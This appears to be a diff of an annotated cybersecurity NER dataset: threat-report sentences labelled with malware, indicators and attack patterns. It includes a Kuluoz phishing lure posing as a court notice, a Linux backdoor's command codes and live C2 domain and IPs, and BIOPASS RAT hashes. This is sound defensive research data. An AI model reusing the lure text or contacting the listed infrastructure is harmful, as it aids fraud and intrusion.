infections.","entities":[],"relations":[],"Comments":[]} -{"id":1404,"text":"Kuluoz makes money for its owner by installing other malware, such as crimeware or fake antivirus programs.","entities":[{"id":45008,"label":"malware","start_offset":0,"end_offset":6},{"id":45009,"label":"attack-pattern","start_offset":70,"end_offset":79},{"id":45010,"label":"attack-pattern","start_offset":83,"end_offset":106}],"relations":[{"id":53,"from_id":45008,"to_id":45009,"type":"uses"},{"id":54,"from_id":45008,"to_id":45010,"type":"uses"}],"Comments":[]} -{"id":1405,"text":" Kuluoz e-mails often trick the reader into thinking they are delivery notifications (such as UPS or Fedex), or notices from airlines or payment processors.","entities":[{"id":46753,"label":"malware","start_offset":1,"end_offset":7}],"relations":[],"Comments":[]} -{"id":1406,"text":"In this case the e-mails claim to contain a document about a court case.","entities":[],"relations":[],"Comments":[]} -{"id":1407,"text":"Subject: Hearing of your case in Court","entities":[],"relations":[],"Comments":[]} -{"id":1408,"text":"From: Notice of Appearance Pretrial Notice, Please, download the copy of the court notice attached herewith to read the details.","entities":[],"relations":[],"Comments":[]} -{"id":1409,"text":"Note: The case may be heard by the judge in your absence if you do not come.","entities":[],"relations":[],"Comments":[]} -{"id":1410,"text":"Truly yours, Clerk to the Court.","entities":[],"relations":[],"Comments":[]} -{"id":1411,"text":"Olivia Smith","entities":[{"id":46754,"label":"identity","start_offset":0,"end_offset":12}],"relations":[],"Comments":[]} -{"id":1412,"text":" Each e-mail carries one of the following attachments: These attachments are different versions of the malware that has been packed to evade antivirus engines.","entities":[],"relations":[],"Comments":[]} -{"id":1413,"text":"Twelve of the 53 scanners on virustotal.com now detect the first variant of the malware, but only three detect the latest version.","entities":[{"id":45011,"label":"SOFTWARE","start_offset":29,"end_offset":43}],"relations":[],"Comments":[]} -{"id":1414,"text":" To determine where the highest number of infected nodes are, we mapped the sending IP address for each of the attach e-mails to their rough geographic location.","entities":[],"relations":[],"Comments":[]} -{"id":1416,"text":" Geographic Distribution of Koluoz Spam Nodes in North America Thus far we’ve detected the following command and control servers in use.","entities":[{"id":45013,"label":"Infrastucture","start_offset":35,"end_offset":45},{"id":45016,"label":"Infrastucture","start_offset":103,"end_offset":121},{"id":45012,"label":"malware","start_offset":28,"end_offset":34},{"id":45014,"label":"location","start_offset":49,"end_offset":62}],"relations":[{"id":55,"from_id":45012,"to_id":45013,"type":"communicates-with"},{"id":56,"from_id":45013,"to_id":45014,"type":"located-at"}],"Comments":[]} -{"id":1417,"text":" The network traffic generated by each Trojan uses the HTTP protocol, and despite its use of port 443, is not encrypted with SSL.","entities":[],"relations":[],"Comments":[]} -{"id":1418,"text":" As with most fast-spreading malware, antivirus engines will typically begin detecting the files a day or two after the spread has begun.","entities":[],"relations":[],"Comments":[]} -{"id":1419,"text":"While we haven’t seen any indication that the spam volume has begun to slow down, we do expect the campaign to wind down in the next 24 hours, but a new campaign will probably be close behind.","entities":[{"id":4262,"label":"TIME","start_offset":124,"end_offset":141}],"relations":[],"Comments":[]} -{"id":1420,"text":"WildFire users can rest assured that they’ll be protected from whatever Kuluoz has in-store next.","entities":[{"id":46758,"label":"SOFTWARE","start_offset":0,"end_offset":8},{"id":46759,"label":"malware","start_offset":72,"end_offset":78}],"relations":[],"Comments":[]} -{"id":1421,"text":" Sign up to receive the latest news, cyber threat intelligence and research from us Please enter your email address! Please mark, I'm not a robot! ","entities":[],"relations":[],"Comments":[]} -{"id":1422,"text":"By submitting this form, you agree to our Terms of Use and acknowledge our Privacy Statement. ","entities":[],"relations":[],"Comments":[]} -{"id":1423,"text":"Following a recent study of apps in the Google Play Store, let’s discuss several security risks caused by the bad certificate management practiced in many Android apps, from social to mobile banking.","entities":[{"id":46760,"label":"SOFTWARE","start_offset":40,"end_offset":57},{"id":46761,"label":"SOFTWARE","start_offset":155,"end_offset":162}],"relations":[],"Comments":[]} -{"id":1424,"text":" All Android apps must be digitally signed with a certificate from the developer.","entities":[{"id":46762,"label":"SOFTWARE","start_offset":5,"end_offset":12}],"relations":[],"Comments":[]} -{"id":1425,"text":"As described in Google’s official document, the app developer is required to create a keystore with a set of private keys, and then use the private key to generate a signed version of apps.","entities":[{"id":46763,"label":"identity","start_offset":16,"end_offset":22}],"relations":[],"Comments":[]} -{"id":1426,"text":"This key has to be valid for at least 25 years.","entities":[],"relations":[],"Comments":[]} -{"id":1427,"text":"These certificates do not have to be generated by a certificate authority and can instead be self-signed.","entities":[],"relations":[],"Comments":[]} -{"id":1428,"text":"Because this is simpler and allows the author to retain the private key, the majority of Google store apps use self-signed certificates.","entities":[{"id":45017,"label":"SOFTWARE","start_offset":89,"end_offset":105}],"relations":[],"Comments":[]} -{"id":1429,"text":"This means it is the developer’s responsibility to keep the private key safe, whether that developer is a 13-year-old or a multi-national company.","entities":[],"relations":[],"Comments":[]} -{"id":1430,"text":"As this means the security protecting private keys varies widely, the security risks of bad certificate management cannot be ignored and must be identified, and where necessary, mitigated.","entities":[],"relations":[],"Comments":[]} -{"id":1431,"text":" Security researchers are starting to take note and publish on this subject.","entities":[],"relations":[],"Comments":[]} -{"id":1432,"text":"For example, BlueBox recently revealed the Fake ID vulnerability, which exploits an app’s certificate verification process within the Android OS.","entities":[{"id":46764,"label":"identity","start_offset":13,"end_offset":20},{"id":46765,"label":"SOFTWARE","start_offset":134,"end_offset":144}],"relations":[],"Comments":[]} -{"id":1433,"text":"If they haven’t already","entities":[],"relations":[],"Comments":[]} -{"id":1434,"text":", soon attackers and malware authors will turn their attention to exploiting vulnerabilities surrounding Android app certificates.","entities":[{"id":46766,"label":"SOFTWARE","start_offset":105,"end_offset":116}],"relations":[],"Comments":[]} -{"id":1435,"text":"When an app is published to the Google Play Store, the certificate information is included within the APK file.","entities":[{"id":46767,"label":"SOFTWARE","start_offset":32,"end_offset":49}],"relations":[],"Comments":[]} -{"id":1436,"text":"To view the certificate information just open the given APK file as a zip file.","entities":[],"relations":[],"Comments":[]} -{"id":1437,"text":"The certificate information is stored within the certificate’s “\/META-INF” folder.","entities":[{"id":46768,"label":"FILEPATH","start_offset":65,"end_offset":74}],"relations":[],"Comments":[]} -{"id":1438,"text":"You can use keytool or openssl tools to view the certificate information.","entities":[],"relations":[],"Comments":[]} -{"id":1439,"text":"An example taken from the popular Angry Birds app is shown in Figure 1.","entities":[{"id":46769,"label":"SOFTWARE","start_offset":34,"end_offset":45}],"relations":[],"Comments":[]} -{"id":1440,"text":"The certificate fingerprints (circled in red) are what can be used to uniquely identify a certificate.","entities":[],"relations":[],"Comments":[]} -{"id":1441,"text":" Figure 1 These digital certificates, self-signed or not, are the keys to updating apps in the Android ecosystem.","entities":[{"id":46770,"label":"SOFTWARE","start_offset":96,"end_offset":103}],"relations":[],"Comments":[]} -{"id":1442,"text":"It is a primary reason the expiration dates are set so far into the future and developers are able to self-sign certificates.","entities":[],"relations":[],"Comments":[]} -{"id":1443,"text":"The only way to update an app is for the developer to sign the update with the same digital certificate originally used to publish the app.","entities":[{"id":47145,"label":"identity","start_offset":41,"end_offset":51}],"relations":[],"Comments":[]} -{"id":1444,"text":"If a developer wants to use a different certificate, they must publish the update separately as a new app.","entities":[],"relations":[],"Comments":[]} -{"id":1445,"text":" Furthermore, all Android apps published using the same certificate have a trust relationship between them.","entities":[{"id":46771,"label":"SOFTWARE","start_offset":18,"end_offset":25}],"relations":[],"Comments":[]} -{"id":1446,"text":"Android allows apps signed by the same certificate to run in the same process and treats them as one single application instead of separate ones.","entities":[{"id":46772,"label":"SOFTWARE","start_offset":0,"end_offset":7}],"relations":[],"Comments":[]} -{"id":1447,"text":"It also allows multiple apps with the same certificate, if using signature-based permission checks, to expose functionality and exchange code and data amongst themselves.","entities":[],"relations":[],"Comments":[]} -{"id":1448,"text":"This is convenient for developers, which is great, but it is also convenient for hackers, which is not.","entities":[],"relations":[],"Comments":[]} -{"id":1449,"text":" Losing control of a certificate’s private key, or using an insecure private key, can have severe security consequences.","entities":[],"relations":[],"Comments":[]} -{"id":1450,"text":"For example, if an attacker obtained the private key of an app, he or she could create a fake APK file, sign it using the same certificate as the legitimate app, and replace the targeted app with fake app on the device silently using the “Application upgrade” procedure.","entities":[],"relations":[],"Comments":[]} -{"id":1451,"text":"In addition, if the attacker can’t create an app with the same name as the targeted app, he or she can still check the “SharedUserId” option.","entities":[],"relations":[],"Comments":[]} -{"id":1452,"text":"This allows apps with different package names but signed with the same certificate to share permissions and stored data.","entities":[],"relations":[],"Comments":[]} -{"id":1453,"text":" Because of this, app developers should be extremely careful about re-using certificates when signing their apps.","entities":[],"relations":[],"Comments":[]} -{"id":1454,"text":" Ideally, an app developer should generate a unique private key for each unique app they post in the Google Play Store.","entities":[{"id":46773,"label":"SOFTWARE","start_offset":101,"end_offset":118}],"relations":[],"Comments":[]} -{"id":1455,"text":" Unfortunately, during our study of apps posted in the Google Play Store we collected approximately 246,000 Android apps but only 11,681 certificates.","entities":[{"id":45020,"label":"SOFTWARE","start_offset":55,"end_offset":72},{"id":45021,"label":"SOFTWARE","start_offset":108,"end_offset":115}],"relations":[],"Comments":[]} -{"id":1456,"text":"The distribution of the number of apps sharing the same key is shown below.","entities":[],"relations":[],"Comments":[]} -{"id":1457,"text":"The X-axis is the number of apps sharing the same certificate.","entities":[],"relations":[],"Comments":[]} -{"id":1458,"text":"The Y-axis is the number of certificates.","entities":[],"relations":[],"Comments":[]} -{"id":1459,"text":"For example, the number of certificates used by only one app is 1,323.","entities":[],"relations":[],"Comments":[]} -{"id":1460,"text":"About 6,925 certificates are used to sign between 6 and 19 different apps.","entities":[],"relations":[],"Comments":[]} -{"id":1461,"text":" Figure 2 ","entities":[],"relations":[],"Comments":[]} -{"id":1462,"text":"As we see in this distribution, a lot of developers sign different apps with the same certificate.","entities":[],"relations":[],"Comments":[]} -{"id":1463,"text":"We further investigated the following cases: ","entities":[],"relations":[],"Comments":[]} -{"id":1464,"text":"1. Signing apps with a publicly known private key Many key pairs are well known in the development community.","entities":[],"relations":[],"Comments":[]} -{"id":1465,"text":"The most famous set of key pairs would be the key pairs included within the AOSP source files (in Table 1, below). ","entities":[{"id":46774,"label":"SOFTWARE","start_offset":76,"end_offset":80}],"relations":[],"Comments":[]} -{"id":1466,"text":"More key pairs can be found in developer forums and academic research.","entities":[],"relations":[],"Comments":[]} -{"id":1467,"text":" Table 1 If one app is signed using the publicly known private keys, it is easy for other apps on the same device to replace this vulnerable app with another APK file, silently with no user knowledge or interaction.","entities":[],"relations":[],"Comments":[]} -{"id":1468,"text":" We scanned our inventory of APK files downloaded from the Google Play Store and found at least 87 apps using the “testkey” in Table 1.","entities":[{"id":46775,"label":"SOFTWARE","start_offset":59,"end_offset":76}],"relations":[],"Comments":[]} -{"id":1469,"text":"According to the Google Play Store, these 87 apps have been downloaded more than 1.6 million times.","entities":[{"id":46776,"label":"SOFTWARE","start_offset":17,"end_offset":34}],"relations":[],"Comments":[]} -{"id":1470,"text":"For security reasons we are not posting the names of any of these apps.","entities":[],"relations":[],"Comments":[]} -{"id":1471,"text":"Under no circumstances should developers ever use private keys that are publicly available, nor should users download them.","entities":[],"relations":[],"Comments":[]} -{"id":1472,"text":"However, it isn’t easy for users to know the app they’re downloading is using a compromised private key – the onus for this is squarely on developers.","entities":[],"relations":[],"Comments":[]} -{"id":1473,"text":" 2. Mobile banking apps sharing one single key Mobile banking apps are particularly sensitive with significant security concerns, which is why we were surprised to discover one certificate was used to sign more than 300 mobile banking apps in the Google Play Store.","entities":[{"id":46777,"label":"SOFTWARE","start_offset":248,"end_offset":265}],"relations":[],"Comments":[]} -{"id":1474,"text":"This practice is not necessarily dangerous, as long as the developer does not share the key with the various banks that contracted the applications.","entities":[],"relations":[],"Comments":[]} -{"id":1475,"text":" We’ve contacted the developer to confirm they have retained sole custody of the keys.","entities":[],"relations":[],"Comments":[]} -{"id":1476,"text":"Of course, even with out-sourced application development, app owners should prefer to hold their own key.","entities":[],"relations":[],"Comments":[]} -{"id":1477,"text":"Whoever controls the key controls updates for the application forever, and a key shared between applications in this way can never be transferred to a financial institution without compromising the security of all of the other apps signed with it.","entities":[],"relations":[],"Comments":[]} -{"id":1478,"text":"The developer is aware of this concern and plans to encourage more of its customers to sign their own applications in the coming year.","entities":[],"relations":[],"Comments":[]} -{"id":1479,"text":"In addition to our research, the Baidu Security team in China recently found 23 mobile banking apps sharing the same certificate hosted by a third party app developer and reported the discovery to the CNCERT in China.","entities":[{"id":45023,"label":"location","start_offset":56,"end_offset":61},{"id":45025,"label":"location","start_offset":211,"end_offset":216},{"id":45026,"label":"identity","start_offset":201,"end_offset":207},{"id":45024,"label":"identity","start_offset":33,"end_offset":52}],"relations":[{"id":58,"from_id":45026,"to_id":45025,"type":"located-at"},{"id":219,"from_id":45024,"to_id":45023,"type":"located-at"}],"Comments":[]} -{"id":1480,"text":" 3. Third party app developers using the same key for all apps generated for all customers ","entities":[],"relations":[],"Comments":[]} -{"id":1481,"text":"The app developer industry is booming.","entities":[],"relations":[],"Comments":[]} -{"id":1482,"text":"These developers help customers build mobile apps for their businesses easily and quickly.","entities":[],"relations":[],"Comments":[]} -{"id":1483,"text":"They serve an important role for the majority of businesses that do not have in-house developers.","entities":[],"relations":[],"Comments":[]} -{"id":1484,"text":"Unfortunately, we uncovered some of these developers using the same certificate for every app.","entities":[],"relations":[],"Comments":[]} -{"id":1485,"text":"Again, using the same private key is probably due to the convenience in app management.","entities":[],"relations":[],"Comments":[]} -{"id":1486,"text":"But as we noted earlier, apps signed by the same certificate can automatically grant sharing relationships amongst themselves.","entities":[],"relations":[],"Comments":[]} -{"id":1487,"text":" This means all of the apps created by these developers, regardless of intended use, could be used maliciously.","entities":[],"relations":[],"Comments":[]} -{"id":1488,"text":"Table 2 shows select top app developers using the same certificate in signing all their apps.","entities":[],"relations":[],"Comments":[]} -{"id":1489,"text":" For security reasons, we have masked the names.","entities":[],"relations":[],"Comments":[]} -{"id":1490,"text":" Table 2 Digital certificates are a critical component of the security of Android apps.","entities":[{"id":46778,"label":"SOFTWARE","start_offset":75,"end_offset":82}],"relations":[],"Comments":[]} -{"id":1491,"text":"Unfortunately, many app developers in the Google Play Store have ignored these concerns in favor of convenience.","entities":[{"id":45027,"label":"SOFTWARE","start_offset":42,"end_offset":59}],"relations":[],"Comments":[]} -{"id":1492,"text":"While in some cases that may be justified – the app may not contain any important or identifying information – in many of the cases we discovered it is not.","entities":[],"relations":[],"Comments":[]} -{"id":1493,"text":"This poses great potential security risks to both app users and app owners.","entities":[],"relations":[],"Comments":[]} -{"id":1494,"text":"We encourage developers to reconsider their stance on this issue and where necessary make changes before a significant security event happens.","entities":[],"relations":[],"Comments":[]} -{"id":1495,"text":" Sign up to receive the latest news, cyber threat intelligence and research from us Please enter your email address!","entities":[],"relations":[],"Comments":[]} -{"id":1496,"text":" Please mark, I'm not a robot! By submitting this form, you agree to our Terms of Use and acknowledge our Privacy Statement.","entities":[],"relations":[],"Comments":[]} -{"id":1497,"text":"A backdoor implant is an increasingly common mechanism for maintaining unauthorized access and control over a computer asset.","entities":[{"id":45029,"label":"attack-pattern","start_offset":71,"end_offset":90}],"relations":[],"Comments":[]} -{"id":1498,"text":"The terms remote administration tool (RAT) and trojan downloader are often used synonymously with such implants.","entities":[],"relations":[],"Comments":[]} -{"id":1499,"text":"Once installed (i.e. implanted on a system), the modern backdoor typically offers much more than simple (i.e. command line) access to a system.","entities":[],"relations":[],"Comments":[]} -{"id":1500,"text":" Depending on the backdoor’s specialization and sophistication, it can also capture keystrokes, take screenshots, scrape memory for valuable information, search for files meeting certain criteria, query databases, download files and additional malware, exfiltrate data and files, and even serve as an attack platform.","entities":[],"relations":[],"Comments":[]} -{"id":1501,"text":"Effectively, a backdoor implant affects loss of control over a computer asset.","entities":[],"relations":[],"Comments":[]} -{"id":1502,"text":" The tangible and intangible impacts of this loss of control vary based on respective backdoor capabilities, and may include the following: leakage of authentication credentials, loss of intellectual property, exposure of sensitive information, negative standing or reputation, and various levels of liability for actions executed on or from the compromised asset.","entities":[],"relations":[],"Comments":[]} -{"id":1503,"text":" Recently Palo Alto Networks discovered a backdoor program ( md5: b826fb1253a52a3b53afa3b7543d7694, sha256: 6bedd1b0716fe7632188932451f75295346836545e6d2bfee1b56121e02ca110 ) that is used to control a linux operating system.","entities":[{"id":45032,"label":"SHA2","start_offset":108,"end_offset":172},{"id":45033,"label":"identity","start_offset":10,"end_offset":28},{"id":45031,"label":"MD5","start_offset":66,"end_offset":98},{"id":45034,"label":"SOFTWARE","start_offset":201,"end_offset":223}],"relations":[{"id":220,"from_id":45031,"to_id":45032,"type":"related-to"}],"Comments":[]} -{"id":1504,"text":" This particular linux backdoor will install itself to \"\/usr\/bin\/btdaemon\" and create a startup service at \"\/etc\/init.d\/bluetoothdaemon\" with symbolic links so that it will run in any startup mode. The file contents are a simple bash script that runs the original btdaemon file.","entities":[{"id":46779,"label":"FILEPATH","start_offset":56,"end_offset":73},{"id":46780,"label":"FILEPATH","start_offset":108,"end_offset":135}],"relations":[],"Comments":[]} -{"id":1505,"text":" The backdoor when run will create threads for each connection listed in its config file. The sample that was caught by our systems contains 3 IP addresses in its config file.","entities":[],"relations":[],"Comments":[]} -{"id":1506,"text":" For each IP address the btdaemon service will attempt to make a connection on UDP ports 53, 80, 110, and 443.","entities":[],"relations":[],"Comments":[]} -{"id":1507,"text":" Upon successful connection it will send the string \"¡°MlCROS0FT|1.2 Apr 26 2014 02:37:05|Linux Kernel Version¡±\" and will wait for an \"Auth\" packet from the server.","entities":[],"relations":[],"Comments":[]} -{"id":1508,"text":" If the backdoor receives a packet in the form of a \"cmdType|cmdBody\" it will check the cmdType list and execute the equivalent instruction. Valid instructions are between 0-9 and there functionality varies depending on the command.","entities":[],"relations":[],"Comments":[]} -{"id":1509,"text":" While running the btdaemon process also inspects whether there is an \".IptabLes\" or \".IptabLex\" local process, and sends back status for monitoring purposes. If the \"disablerun\" command is sent the backdoor will download a file named \"run.txt\" from one of the following URLs: The file data is in the format \"exe_path_1 | exe_path_2 | ... | exe_path_N\". If none of the paths is correct then a \"getsetup.rar\" file is downloaded and run.","entities":[{"id":45035,"label":"FILEPATH","start_offset":397,"end_offset":409},{"id":45037,"label":"FILEPATH","start_offset":237,"end_offset":244}],"relations":[],"Comments":[]} -{"id":1510,"text":"This is an ELF file and there are various encrypted portions within it.","entities":[],"relations":[],"Comments":[]} -{"id":1511,"text":" There exist two embedded zlib-encrypted blocks at file offset 0x8C0C0 and 0xE6B40 respectively.","entities":[{"id":4493,"label":"tools","start_offset":26,"end_offset":30}],"relations":[],"Comments":[]} -{"id":1512,"text":" When run if the filename does not include the \"IptabLes\" string then the data is decrypted, written to disk, and then executed, installing itself as a startup service on the machine and place itself in one of the following locations: The second encrypted block is configuration data, which includes some IP addresses and DNS data which is used when it writes the first decrypted block to a file.","entities":[],"relations":[],"Comments":[]} -{"id":1513,"text":" \"dns.po888.com|122.228.242.51|119.145.148.56|162.221.13.82\".","entities":[{"id":46781,"label":"DOMAIN","start_offset":2,"end_offset":15},{"id":46782,"label":"IPV4","start_offset":16,"end_offset":30},{"id":46783,"label":"IPV4","start_offset":31,"end_offset":45},{"id":46784,"label":"IPV4","start_offset":46,"end_offset":59}],"relations":[],"Comments":[]} -{"id":1514,"text":" If the file is run in a path including the \"IptabLes\" string then it installs itself as a startup service and proceeds into its main loop.","entities":[],"relations":[],"Comments":[]} -{"id":1515,"text":" Either path the \"getsetup.rar\" file takes is meant to ensure that it is installed as a startup service, ensuring persistence. Once the file is running it creates a process identifier (PID) so that only one instance is running at any given time.","entities":[{"id":46785,"label":"FILEPATH","start_offset":18,"end_offset":30}],"relations":[],"Comments":[]} -{"id":1516,"text":"The file will connect to an IP and port configured from the configuration data and sends along information that includes the cpu and memory information.","entities":[],"relations":[],"Comments":[]} -{"id":1517,"text":" If the file does not receive any data within 30 seconds it will send a \"xy\" response back to the server.","entities":[],"relations":[],"Comments":[]} +{"id":3359,"text":"Indicators of Compromise (IoCs) SHA256 Filename Note Analysis 84fbf74896d2a1b62d73b9a5d0be2f627d522fc811fe08044e5485492d2d4249 big.txt BIOPASS RAT Python Script (Version 3) TrojanSpy.Python.BIOPASS.A f3c96145c9d6972df265e12accfcd1588cee8af1b67093011e31b44d0200871f c1222.txt BIOPASS RAT Python Script (C1222 module) Trojan.Python.BIOPASS.A 0f8a87ca5f94949904804442c1a0651f99ba17ecf989f46a3b2fde8de455c4a4 c1222.txt BIOPASS RAT Python Script (C1222 module) Trojan.Python.BIOPASS.A d8b1c4ad8f31c735c51cb24e9f767649f78ef5c571769fbaac9891c899c33444 c1222.txt BIOPASS RAT Python Script (C1222 module) ","entities":[{"id":10167,"label":"SHA1","start_offset":71,"end_offset":135},{"id":10168,"label":"malware","start_offset":146,"end_offset":157},{"id":10169,"label":"SHA1","start_offset":213,"end_offset":277},{"id":10170,"label":"malware","start_offset":290,"end_offset":301},{"id":10171,"label":"SHA2","start_offset":357,"end_offset":421},{"id":10172,"label":"malware","start_offset":434,"end_offset":445},{"id":10173,"label":"SHA2","start_offset":501,"end_offset":565},{"id":10174,"label":"malware","start_offset":578,"end_offset":589},{"id":48970,"label":"FILEPATH","start_offset":137,"end_offset":144},{"id":48972,"label":"FILEPATH","start_offset":279,"end_offset":288},{"id":48975,"label":"malware","start_offset":476,"end_offset":499},{"id":48976,"label":"FILEPATH","start_offset":567,"end_offset":576},{"id":48974,"label":"FILEPATH","start_offset":423,"end_offset":432},{"id":48971,"label":"malware","start_offset":185,"end_offset":211},{"id":48973,"label":"malware","start_offset":332,"end_offset":355}],"relations":[{"id":516,"from_id":10167,"to_id":10168,"type":"indicates"},{"id":517,"from_id":48970,"to_id":10168,"type":"indicates"},{"id":519,"from_id":48970,"to_id":10167,"type":"duplicate-of"},{"id":520,"from_id":10168,"to_id":48971,"type":"duplicate-of"},{"id":521,"from_id":10169,"to_id":10170,"type":"indicates"},{"id":522,"from_id":48972,"to_id":10170,"type":"indicates"},{"id":523,"from_id":48972,"to_id":10169,"type":"duplicate-of"},{"id":524,"from_id":48973,"to_id":10170,"type":"duplicate-of"},{"id":525,"from_id":10171,"to_id":10172,"type":"indicates"},{"id":526,"from_id":48974,"to_id":10172,"type":"indicates"},{"id":527,"from_id":48975,"to_id":10172,"type":"duplicate-of"},{"id":528,"from_id":48974,"to_id":10171,"type":"duplicate-of"},{"id":529,"from_id":10173,"to_id":10174,"type":"indicates"},{"id":530,"from_id":48976,"to_id":10174,"type":"indicates"},{"id":531,"from_id":48976,"to_id":10173,"type":"duplicate-of"}],"Comments":[]} +{"id":5203,"text":"Scope","entities":[],"relations":[],"Comments":[]} +{"id":2650,"text":"The ransomware note was also used to recruit insiders from victim organizations.","entities":[],"relations":[],"Comments":[]} +{"id":8825,"text":"For example in 2017, our Security Reliability Engineering team measured a record-breaking UDP amplification attack sourced out of several Chinese ISPs (ASNs 4134, 4837, 58453, and 9394), which remains the largest bandwidth attack of which we are aware.","entities":[{"id":27338,"label":"attack-pattern","start_offset":94,"end_offset":107},{"id":27341,"label":"location","start_offset":163,"end_offset":167},{"id":27343,"label":"location","start_offset":176,"end_offset":179},{"id":27344,"label":"location","start_offset":242,"end_offset":245}],"relations":[],"Comments":[]} +{"id":4079,"text":"Hence, the command will be this format: `[`] HTShell currently supports three different backdoor functions, shown here: Command code Function 0 Open a command shell for command execution 1","entities":[{"id":49915,"label":"malware","start_offset":119,"end_offset":126}],"relations":[],"Comments":[]} +{"id":9023,"text":"Lazarus\u2019 backend logs also record victim IP addresses.","entities":[],"relations":[],"Comments":[]} +{"id":7703,"text":"The encrypted sample \u2014 via XOR encoding\/URL encoding \u2014 also received a response from the C&C encrypted with XOR.","entities":[{"id":23942,"label":"location","start_offset":14,"end_offset":20},{"id":23943,"label":"attack-pattern","start_offset":40,"end_offset":52}],"relations":[],"Comments":[]} +{"id":665,"text":"In this threat brief we show you five different ways that Office documents can be subverted and abused to attack and compromise a Windows endpoint, some we\u2019ve already posted about before, and some are new.","entities":[{"id":46244,"label":"SOFTWARE","start_offset":130,"end_offset":137}],"relations":[],"Comments":[]} +{"id":7178,"text":"To help prevent any damage, we decided to publish our findings before the group deploys the attack.","entities":[],"relations":[],"Comments":[]} +{"id":11219,"text":"Once the attacker has logged in to the victim\u2019s account, HYPERSCRAPE checks to see if the language is set to English, changing it if not.","entities":[],"relations":[],"Comments":[]} +{"id":4771,"text":"For example, users are provided visibility into the permissions requested by each app, and they are able to control those permissions.","entities":[],"relations":[],"Comments":[]} {"id":1518,"text":" If the file does receive data from the server in excess of 20 bytes it will be in the following format: <2 byte data length><0xABCDEF88> The decrypted data will contain the following fields: The attack type field is used to determine if a SYN DDoS or DNS DDoS is used in an attack.","entities":[],"relations":[],"Comments":[]} -{"id":1519,"text":" The Src IP Begin and End are the start and ending IP ranges used as a fake src addresses in the DNS DDoS. The IP range can also be controlled by global variables within the binary itself as well.","entities":[],"relations":[],"Comments":[]} -{"id":1520,"text":" If the received data has 0x22 as the first set of bytes then the received data will be in the following format: <0x22> It will also do the following UDP connection test: If the first value in the packet is 0xC8 then the file will set \"g_mainsrvinfo.srandipb\" and \"g_mainsrvinfo.srandipe\" and \"g_mainsrvinfo.udpport\" to the passed in values.","entities":[],"relations":[],"Comments":[]} -{"id":1521,"text":" If the first value in the packet is 0xCC then the file will set \"g_mainsrvinfo.srandipb\" and \"g_mainsrvinfo.srandipe\". If the first value in the packet is 0x33 the file will use tcp to download a file and execute it.","entities":[],"relations":[],"Comments":[]} -{"id":1522,"text":" If the first value in the packet is 0x20 the file will delete all DDoS tasks.","entities":[],"relations":[],"Comments":[]} -{"id":1523,"text":" If the first value in the packet is 0x10 then the file will send back the current socket handle as a response back.","entities":[],"relations":[],"Comments":[]} -{"id":1524,"text":" Currently these IP addresses are alive and active.","entities":[],"relations":[],"Comments":[]} -{"id":1525,"text":" Palo Alto Networks strongly recommends you inspect your systems and update your firewall rules and IPS systems. Palo Alto Networks customers with active subscriptions to Threat Prevention are protected against these threats automatically, signature #13469 was released to protect against this specific threat.","entities":[{"id":46786,"label":"identity","start_offset":1,"end_offset":19},{"id":46787,"label":"identity","start_offset":114,"end_offset":132}],"relations":[],"Comments":[]} -{"id":1526,"text":" Similar to any other malware family or threat, Palo Alto Networks customers should use the entire security framework for threat mitigation and threat prevention coverage. Sign up to receive the latest news, cyber threat intelligence and research from us Please enter your email address!","entities":[{"id":46788,"label":"identity","start_offset":48,"end_offset":66}],"relations":[],"Comments":[]} -{"id":1527,"text":" Please mark, I'm not a robot!","entities":[],"relations":[],"Comments":[]} -{"id":1528,"text":" By submitting this form, you agree to our Terms of Use and acknowledge our Privacy Statement.","entities":[],"relations":[],"Comments":[]} -{"id":1529,"text":"This post is also available in: 日本語 (Japanese) In July 2020, Microsoft released a security update, CVE-2020-1350 | Windows DNS Server Remote Code Execution Vulnerability, for a new remote code execution (RCE) vulnerability.","entities":[{"id":46789,"label":"TIME","start_offset":56,"end_offset":65},{"id":46790,"label":"identity","start_offset":67,"end_offset":76},{"id":46791,"label":"vulnerability","start_offset":105,"end_offset":118},{"id":46792,"label":"vulnerability","start_offset":121,"end_offset":176},{"id":46793,"label":"attack-pattern","start_offset":187,"end_offset":214}],"relations":[{"id":221,"from_id":46791,"to_id":46792,"type":"related-to"},{"id":223,"from_id":46793,"to_id":46791,"type":"targets"},{"id":222,"from_id":46793,"to_id":46792,"type":"targets"}],"Comments":[]} -{"id":1530,"text":" This vulnerability exists within the Microsoft Windows Domain Name System (DNS) Server due to the improper handling of certain types of requests, specifically over port 53\/TCP.","entities":[{"id":45039,"label":"SOFTWARE","start_offset":40,"end_offset":82},{"id":4560,"label":"identity","start_offset":40,"end_offset":49}],"relations":[],"Comments":[]} -{"id":1531,"text":"Exploitation of this vulnerability is possible by creating an integer overflow, potentially leading to remote code execution.","entities":[{"id":46794,"label":"attack-pattern","start_offset":103,"end_offset":124}],"relations":[],"Comments":[]} -{"id":1532,"text":" This vulnerability only affects Windows DNS and the following builds of the Microsoft Windows operating system (OS): ","entities":[{"id":46795,"label":"SOFTWARE","start_offset":33,"end_offset":44},{"id":46796,"label":"SOFTWARE","start_offset":77,"end_offset":116}],"relations":[],"Comments":[]} -{"id":1533,"text":"As always, we recommend our customers patch their systems as soon as possible.","entities":[],"relations":[],"Comments":[]} -{"id":1534,"text":"Microsoft also provided a workaround in cases where patches are not immediately possible.","entities":[{"id":46797,"label":"identity","start_offset":0,"end_offset":9}],"relations":[],"Comments":[]} -{"id":1535,"text":"Please review KB4569509: Guidance for DNS Server Vulnerability CVE-2020-1350 for more details.","entities":[{"id":46798,"label":"vulnerability","start_offset":38,"end_offset":76}],"relations":[],"Comments":[]} -{"id":1536,"text":" Palo Alto Networks Threat Prevention and Cortex XDR provide protection against the exploitation of this vulnerability: Palo Alto Networks will update this Threat Brief with new information and recommendations as they become available.","entities":[{"id":45043,"label":"identity","start_offset":123,"end_offset":141},{"id":45040,"label":"identity","start_offset":3,"end_offset":21},{"id":45041,"label":"SOFTWARE","start_offset":44,"end_offset":54},{"id":45042,"label":"SOFTWARE","start_offset":3,"end_offset":39}],"relations":[],"Comments":[]} -{"id":1537,"text":" Sign up to receive the latest news, cyber threat intelligence and research from us Please enter your email address!","entities":[],"relations":[],"Comments":[]} -{"id":1538,"text":" Please mark, I'm not a robot!","entities":[],"relations":[],"Comments":[]} -{"id":1539,"text":"By submitting this form, you agree to our Terms of Use and acknowledge our Privacy Statement. ","entities":[],"relations":[],"Comments":[]} -{"id":1540,"text":"Overview Palo Alto Networks Unit 42 threat research team has just uncovered a new set of attacks by the Sofacy group using malicious emails targeting foreign affairs agencies and ministries in North America and Europe, including a European embassy in 